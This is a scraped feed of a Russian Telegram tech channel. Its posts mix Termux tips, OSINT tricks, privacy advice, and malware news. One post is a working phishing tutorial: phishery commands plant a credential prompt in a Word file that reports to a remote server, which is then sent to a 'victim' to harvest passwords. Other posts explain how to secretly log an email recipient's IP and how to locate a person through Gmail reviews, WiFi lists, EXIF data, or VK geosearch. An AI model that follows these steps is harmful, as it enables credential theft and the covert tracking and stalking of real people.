Эксплойт
2.01M subscribers
13.7K photos
6.6K videos
2 files
9.66K links
Главное медиа об интернет-культуре и технологиях.

Больше интересного на https://exploit.media

Написать в редакцию: @exploitex_bot

Сотрудничество: @todaycast

РКН: https://clck.ru/3FjURF
Download Telegram
​​Скачиваем все фото с инстаграм аккаунта с помощью Termux

Очень полезная программа, которая позволяет скачать сразу все фото из инстаграм аккаунта. По понятным причинам работает только для публичных аккаунтов.

1. Скачиваем нужные пакеты
apt update && apt upgrade && pkg install python
2. Скачиваем программу
pip install instaloader
3. Запускаем программу
instaloader profile имя_пользователя

Чтобы посмотреть скачанные фото, перекинем их в корневую директорию устройства.
cp -r имя_пользователя /sdcard

#termux
​​​​Получаем открытую информацию о сайте или IP-адресе

Главной ценностью информации является её оперативность и теперь вам не нужно открывать браузер, чтобы получить информацию о необходимом сайте или IP-адресе.

С помощью бота @whoisdombot можно узнать основную whois-информацию для доменного имени и IP-адреса, среди которой:

— Дата регистрации домена;
— Контактная информация владельца;
— Информация о доменном регистраторе;
— Дата окончания регистрации домена.

Также можно отправить боту IP адрес, например компьютера и узнать информацию о его провайдере и местонахождении с точностью до города.

#OSINT #telegram
​​Как браузер может идентифицировать пользователя

Цифровой отпечаток устройства - это невероятно точный метод выявления уникальных браузеров и отслеживания онлайн-активности. Веб-сайты используют его для для сбора информации о типе и версии браузера, а также о вашей операционной системе, активных плагинах, часовом поясе, языке, разрешении экрана и других активных настройках.

Поначалу эти данные могут показаться общими и не помогут в идентификации одного конкретного человека. Тем не менее, вероятность того, что цифровой отпечаток у другого пользователя информация будет совпадать на 100%, весьма мала. Только 1 из 286 777 других браузеров будет иметь тот же отпечаток, что и вы.

Сайт https://amiunique.org поможет вам понять, на сколько уникален ваш цифровой отпечаток и какие параметры выдают вас среди других пользователей.

#анонимность
​​Как запутать своего интернет-провайдера через Termux

Всем давно известно, что провайдеры ведут логи и собирают информацию о том, какие сайты мы посещаем и когда мы это делаем.

Эта программа будет делать множество запрос в день на различные сайты с вашего IP, что может запутать провайдера, который пристально следит за вами.

1. Скачиваем нужные пакеты:
apt update && apt upgrade -y && apt install python git -y
2. Скачиваем зависимости:
pip install requests
3. Скачиваем репозиторий:
git clone https://github.com/1tayH/noisy.git
4. Открываем директорию:
cd noisy
5. Запускаем файл:
python noisy.py --config config.json

Опцианальные аргументы:
--log -l -> Настройка уровеня регистрации
--config -c -> Кастомный config файл
--timeout -t -> Время работаты сканера (в секундах)

#анонимность #termux
​​Кража ваших SMS сообщений с помощью 0day уязвимости в iOS

Недавно пользователь твиттра s1guza нашел уязвимость нулевого дня в новейшей, не бета-версии iOS (13.4.1), которая позволяет написать вредоносное приложение для кражи истории сообщений iMessage.

Для воспроизведения уязвимости нужно создать вредоносное приложение, которое загружает файл sms.db и отправляет на сервер, подписать его и установить на устройство. Далее включить принимающий сервер и как только приложение будет запущено, на сервере появится база данных.

Этот баг был исправлен в бета-версии iOS 13.5, однако для обновления эта версия еще не доступна, поэтому не устанавливайте подозрительные приложения, пока Apple не выпустит обновление.

#новость
​​Как получить местонахождение человека, использующего Gmail

Пользователи Google нередко оставляют отзывы о заведениях, которые посещают. Однако, они иногда не подозревают, что имея на руках адрес электронной почты можно с легкостью узнать, какие отзывы и где человек оставлял. А исходя из этого, понять его примерное местонахождение.

1. Заходим на contacts.google.com и добавляем E-Mail в контакты.
2. Наводим на меленькую фотографию контакта в левом нижнем углу появившегося окошка и заходим в код элемента.
3. Находим строчку <div class="NVFbjd LAORIe " data-sourceid="115978902187173497207"> и копируем числовое значение - это GoogleID
4. Вставляем его вместо <GoogleID> в ссылку https://www.google.com/maps/contrib/<GoogleID> и переходим по ней.

Если человек когда либо оставлял отзывы, вы увидите, где и когда это было, и что он писал.
​​Хакеры воровали данные через вредоносный код в иконках сайтов

Недавно аналитики выявили новую серию странных взломов интернет-магазинов, единственной целью которых была подмена иконок (favicon) на взломанных сайтах. Новые favicon представляли собой файлы изображений, размещенные на неком сайте MyIcons, и не содержали вредоносного кода. Хитрость заключалась в том, что сайт MyIcons предоставлял легитимный файл favicon для всех страниц атакованного ресурса, кроме тех, где размещались формы оформления заказа.

На страницах оформления заказа MyIcons подменял обычный favicon вредоносным файлом JavaScript, который создавал поддельную форму оплаты и воровал введенные в нее данные карты пользователя.

Владельцы сайтов, заметившие обращения к MyIcons, обнаружили бы безвредный портал для хостинга favicon. Однако на самом деле данный сайт выступал клоном легитимного портала IconArchive.com и служил обычной ширмой для проведения атак.

#новость
​​Откажитесь от автоподключения к Wi-Fi

В iPhone есть удобная функция, позволяющая автоматически подключаться к знакомым Wi-Fi-сетям. Как только смартфон видит знакомую сеть, он тут же пытается подключиться к ней, не спрашивая разрешения у пользователя. С одной стороны, это удобно. С другой стороны, никто не мешает злоумышленнику настроить свою, поддельную Wi-Fi-сеть и замаскировать ее под известный публичный хотспот, дав ей то же имя.

В результате вы можете даже не заметить, что пользуетесь Интернетом не через сотовую сеть, а через Wi-Fi, в то время как ваши данные уже потекут к хакеру на сервер. Тщательно проверяйте, к каким сетям вы подключаетесь, предварительно заставив iPhone «забыть» знакомые сети и включив подтверждение подключения к Wi-Fi, что значительно снизит риск незаметно подключиться к потенциально опасной Wi-Fi-сети.

Зайдите в «Настройки» –> «Wi-Fi» –> Выбрать нужную беспроводную сеть –> «Забыть эту сеть» –> «Вернуться в Wi-Fi» –> «Подтверждать подключение: вкл.».

#безопасность #iPhone
​​Как получить учетные данные пользователя через Microsoft Word

Phishery встраивает в существующий документ Microsoft Word появляющееся окно с требованием ввести имя пользователя и пароль.

Установка в Kali Linux:
$ apt-get install phishery
$ mkdir phishery
$ tar -xvf phishery.tar.gz --strip=1 -C ./phishery
cd phishery

Открываем файл настроек (settings.json), в настройках нам нужно указать:
port — порт, на котором будет работать сервер.

После настройки phishery, загружаем на сервер файл в формате docx, в который мы встроим фишинговый код:
./phishery -u https://example.com/docs -i zarplata.docx -o zarplata_phish.docx

Запускаем сервер, для получения и сохранения аутентификационных данных:
$ ./phishery -s settings.json -c credentials.json

Теперь отправляем файл жертве и ждем открытия. При открытии файла, поверх MS Word появится окно запроса имени и пароля. При вводе любых данных и нажатии OK, мы получим эти данные и они отобразятся в логах и запишутся в файл credentials.json.
​​P2P чат в Termux

Как вы знаете, все сообщения, что вы отправляете в сети проходят через централизованный сервер, что не безопасно по целому ряду очевидных причин. Сегодня, я расскажу вам, как общаться в одноранговой сети (P2P) используя NetCat.

Для того, чтоб протестировать эту сеть 2 устройства не понадобится, можно использовать 2 вкладки в Termux.

1-ое устройство
1. Скачиваем NetCat
$ pkg install netcat
2. Узнаем свой IP
$ ifconfig
3. Открываем порт на прослушку (абсолютно любые 5 цифр)
$ nc -l -p 56789

2-ое устройство
1. Также скачиваем NetCat
$ pkg install netcat
2. Подключаемся к первому устройству используя ip и порт
$ nc IP 56789

#безопасность #termux
​​Как узнать IP адрес человека, открывшего электронное письмо

Многие привыкли думать, что отправитель письма не знает, когда мы его открыли и открыли ли вообще. Однако это далеко не так.

Для начала, нам нужно получить ссылку для отслеживания, для этого заходим на https://iplogger.ru, нажимаем Невидимый логгер и сохраняем к себе полученную ссылку. Далее нам понадобится HTML код письма, в котором необходимо заменить http://TRACKING URL/ на нашу ссылку из IPLogger.

По умолчанию почтовики Gmail, Yandex и другие не поддерживают HTML форматирование, поэтому в поле ввода текста письма введите произвольный текст, а затем нажмите правую клавишу мыши и выберите пункт меню «Просмотреть код». В появившемся окне найдите элемент c нашим текстом и выберите «Edit as HTML». В появившемся блоке замените текст на код, предварительно вставив свою ссылку, и нажмите Ctrl+Enter.

Теперь меняем текст письма в самом редакторе и нажимаем отправить. Когда получатель откроет ваше письмо, в панели управления логгером появится его IP адрес. Данный способ работает не со всеми почтовыми клиентами.
​​Расширение для быстрого просмотра данных Exif

Фотографии содержат много информации. Прикрепленные метаданные могут показать, где была сделана фотография, какой тип камеры и ее настройки использовались во время фотосъемки. Для получения доступа к этой скрытой информации можно использовать несколько расширений, которые позволяют получать данные Exif одним кликом мыши.

Многие веб-сайты удаляют данные Exif из загруженных изображений, но некоторые этого не делают. На скриншоте ниже можно точно увидеть, когда была сделана эта фотография, а также тип используемой камеры и какие настройки камеры использовались.

💾 Установите Exif Viewer: FirefoxChrome

#полезно
​​В Китае устанавливают камеры наблюдения внутри квартир граждан

Пандемия коронавируса приблизила камеры наблюдения к приватной жизни людей: вместо общественных мест они теперь устанавливаются перед входными дверями, а в некоторых случаях даже внутри квартир жителей, даже без их разрешения.

Жительница Гуанчжоу, сообщила, что перед её дверью установили видеокамеру с лампами, которые ярко светят в лицо, когда она открывает входную дверь. А вернувшемуся домой жителю города Чанчжоу на следующий день установили камеру, направленную на входную дверь, со стены шкафа в прихожей. Очевидцы сообщают, что камеры для наблюдения за находящимися в карантине жителями передают картинку на смартфоны полицейских и общественных работников.

Также некоторым гражданам на карантине вместо видеокамеры ставят на дверь магнитную сигнализацию, которая уведомляет власти об открытии дверей.

#новость
​​Прямая передача файлов между устройствами по WebRTC

Новый сервис WebWormHole позволяет передавать файлы с одного компьютера на другой через пиринговый тоннель, который быстрее и безопаснее, чем передача по почте, FTP или другими способами.

Для того, чтобы установить соединение зайдите на сайт и нажмите кнопку «New Wormhole». Вы получите код для входа, который человек с другой стороны должен ввести, чтобы между вами установился туннель, по которому напрямую передаются файлы. Далее просто загружаете файл и он моментально будет передан получателю на другом конце тоннеля.

Для установки портала между устройствами необязательно открывать браузер, клиент на Go запускается из командной строки и генерирует одноразовый код в консоли, где и происходит передача данных. Инструкция по установке и исходный код доступны на GitHub.

#безопасность
​​Малварь прячет управляющие серверы в описаниях YouTube-каналов

Инфостилер Astaroth впервые был замечен специалистами еще в 2018 году. Он использует множество антианалитических и антиsandbox механик, что крайне затрудняет как обнаружение малвари, так и изучение ее операций. Перед выполнением малварь проводит различные проверки, чтобы убедиться, что работает на реальном компьютере, а не в песочнице. Это помогает скрывать пейлоады и оставаться незамеченной.

Однако вышеописанными препонами разработчики трояна не ограничились. Так, после последнего обновления Astaroth стал использовать описания каналов на YouTube, чтобы скрывать URL своих управляющих серверов от любопытных глаз.

После того, как троян заразил машину жертвы, он подключается к специальному каналу на YouTube и обращается к полю описания этого канала. Поле содержит закодированный base64 текст с URL-адресами управляющих серверов. Расшифровав данные, Astaroth подключается к этим URL-адресам, чтобы получить новые команды от своих операторов и предать им похищенную ­информацию.

#новость
​​Как найти местоположение человека по фотографии с помощью Termux

В метаданных храниться много интересных вещей: тип камеры, модель телефона, имя, изменения фотографии, но самое интересное - это место съемки. Сейчас я покажу вам, как его посмотреть.

Скачиваем нужные пакеты
$ apt update && apt upgrade -y && pkg install exiftool -y
Даем termux разрешение на просмотр памяти устройства
$ termux-setup-storage
Смотрим метаданные фотографии с которой находимся в одной директории
$ exiftool filename.jpg

Далее, ищем пункт GPS Position, где меняем "deg" на "°". Далее заходим на Google Maps и вставляем в поиск полученные координаты, в качестве результата вы получите точную локацию, где была сделана фотография.

Если таких координат нет, то значит устройство не записывает геолокацию в метаданные или она была удалена.

#termux
​​Хакеры взламывали телефоны израильских военных через Tinder

Героями этой истории стали сразу несколько десятков солдат израильской армии. Все они завели в сети приятные знакомства, а потом обнаружили, что сливают гостайну.

C конца 2019 года на сайтах знакомств солдатам стали активно писать девушки, которые с ходу были готовы делиться пикантными фото, правда, только в специальном защищенном приложении и предлагали скачать по ссылке.

Те, кто поддался на уговоры, обнаруживали, что их смартфоны начинали вести себя странно. Активировалась передача данных, рос исходящий трафик, сами собой включались камера и диктофон. Скоро выяснилось, что «секретный чат» с фото – вредонос для удаленного управления телефоном, а «девушки» – хакеры ХАМАС. На протяжении нескольких месяцев они имели доступ к информации о местоположении пораженных устройств, фотографиям и контактам телефона.
​​Поиск фотографий в VK по геолокации

Когда вы публикуете фотографию, ВК автоматически фиксирует геолокацию, где была сделана фотография. С помощью этого способа мы можем получить список фотографий, сделанных в определенном месте.

1. Узнаем координаты места с помощью сервиса Google Maps.
2. Переходим на https://vk.com/dev/photos.search и ищем там «Пример запроса»
3. Заполняем необходимые поля в запросе:
lat и long — географическая широта и долгота
start_time — время в формате unixtime, не раньше которого должны были быть загружены найденные фотографии.
end_time — время в формате unixtime, не позже которого должны были быть загружены найденные фотографии.
sort — сортировка результатов. 1 - по количеству отметок «Мне нравится»; 0 - по дате добавления фотографии.
count — количество возвращаемых фотографий.
radius — радиус поиска в метрах.

В ответе мы получим XML структуру со списком фотографий. Для каждой фотографии будет доступна такая информация, как:
owner_id — ID пользователя VK;
lat и long — точные координаты фотографии;

Также будут приложены ссылки на фотографии в разных размерах.

#OSINT
​​Как запускать подозрительные программы в онлайн песочнице

Если вы сомневаетесь в безопасности скачиваемого файла, вы можете проверить, как он поведет себя в системе с помощью Hybrid Analysis. Это бесплатный онлайн-сервис для проверки файлов и веб-страниц на предмет заражения вредоносным кодом.

В отличие от VirusTotal, представляющего собой «консилиум» антивирусов, Hybrid Analysis является песочницей. Когда вы отправляйте файл на проверку, сервис запускает его в изолированной среде VirtualBox или VMware, а затем смотрит, как он поведет себя в системе. На основании произведенных файлом изменений выдается заключение о его безопасности или вредоносности.

При отправке файла на анализ пользователь может выбрать ОС, в которой он будет запущен на исполнение. Доступны Windows 7, Linux Ubuntu и Android. По завершении анализа вы получите общий отчет VirusTotal и результаты гибридного и сетевого анализа с прилагаемыми скриншотами запуска в виртуальной системе.

#безопасность
​​Как вычислить местонахождение человека по скриншоту WiFi сетей

Wigle.net - удивительный ресурс, который хранит данные о беспроводных сетях, собираемые пользователями на своих телефонах, планшетах и ​​ноутбуках, используя инструменты для прослушивания WiFi. На карте можно посмотреть, какие Wi-Fi сети находятся в определённом месте.

После регистрации нам открывается больше возможностей, как например поиск WiFi сетей по названию или BSSID (MAC-адрес точки доступа). Например, если к вам в руки попал список доступных Wi-Fi сетей устройства, вы сможете определить его точное местонахождение. Для этого, используя поиск по названию, нужно найти, где находится хотя бы одна из доступных сетей.

Радиус действия WiFi, как правило, не большой, поэтому местонахождение сети укажет нам на точную геолокацию устройства.

Если сеть имеет уникальные название и находится в большом городе, то найти ее расположение не составит труда. На карте не обязательно найдутся все сети, так как устройство может находиться в деревне или слабо-населенном городе, куда пользователи, собирающие данные, еще не успели добраться.

#OSINT